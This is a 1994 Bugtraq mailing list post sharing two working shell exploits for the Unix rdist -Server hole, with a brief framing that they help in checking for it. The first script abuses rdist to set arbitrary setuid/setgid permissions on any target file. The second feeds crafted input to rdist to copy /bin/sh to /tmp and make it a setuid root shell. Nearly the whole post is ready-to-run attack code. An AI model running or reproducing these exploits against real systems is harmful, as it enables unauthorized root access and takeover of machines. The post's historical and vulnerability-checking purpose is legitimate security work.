Bugtraq mailing list archives
Those RDIST things
From: dave () elxr Jpl Nasa Gov (Dave Hayes)
Date: Mon, 14 Mar 1994 12:51:06 -0800
Figured I'd post them here first. This is nothing new, but it may provide
clues to some of you on how to check for the rdist hole.
------
Dave Hayes - Institutional Network & Communications - JPL/NASA - Pasadena CA
dave () elxr jpl nasa gov dave () jato jpl nasa gov ...usc!elroy!dxh
Nasrudin went into a bank with a check to cash. "Can you identify yourself?"
asked the clerk.
Nasrudin took out a mirror and peered into it. "Yes, that's me alright."
- ------cut here------
#! /bin/sh
# GIMME - "gimme' a file"
# Demonstrate rdist's ability to give me permission to access anything.
#
# gimme <pathname> [<permission> [<directory>]]
# <pathname> is the target file.
# <permission> is the octal mode to which the file access permission
# should be set. Note that this may not be effective unless
# either the SUID (4000) or SGID (2000) bits are also requested.
# <directory> is the target directory for rdist to use if a hard
# link is desired. Note that the user must have permission
# to create this directory, it must be on the same filesystem
# as the target file, and the target file must not be a
# directory. This option is necessary to change the ownership
# of the target if chown() of a symbolic link modifies the
# link itself, and not the file it refers to.
#
# 1991.9.14 - Tsutomu Shimomura, Los Alamos National Laboratory
# tsutomu () no-sense LANL GOV
dirname=gimme$$
deftemp=/tmp
defperm=6777
if [ $1x = x ]; then
echo "Usage: $0 <pathname> [<permission> [<directory>]]" >&2
exit 1
fi
if [ $2x != x ]; then
perm=$2
else
perm=$defperm
fi
if [ $3x != x ]; then
link="ln"
temp=$3/$dirname
target=$1
else
link="ln -s"
temp=$deftemp/$dirname
case $1 in
/*)
target=$1
;;
*)
target=`pwd`/$1
;;
esac
fi
trap "rm -fr $temp; exit 1" 1 2 15
umask 66
mkdir $temp; if [ $? != 0 ]; then
exit 1
fi
set `whoami` $LOGNAME
user=$1
set daemon `groups`
while [ $# != 1 ]; do
shift
done
group=$1
(
echo "t$temp/something"
echo "R0 $perm 1 0 $user $group "
while [ ! -f $temp/rdist* ]; do
sleep 1
done
set $temp/rdist*
rm -f $1
if $link $target $1 >&2; then
echo "" | dd bs=3 conv=sync 2>/dev/null
echo ""
echo 0 > $temp/status
else
echo 1 > $temp/status
fi
exit
) | rdist -Server
status=`cat $temp/status`
rm -fr $temp
exit $status
- ------cut here------
#!/bin/sh
SUID=/tmp/foosh
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
echo "$SUID is a setuid shell. "
fi
------- End of Forwarded Message
Current thread:
- Those RDIST things Dave Hayes (Mar 14)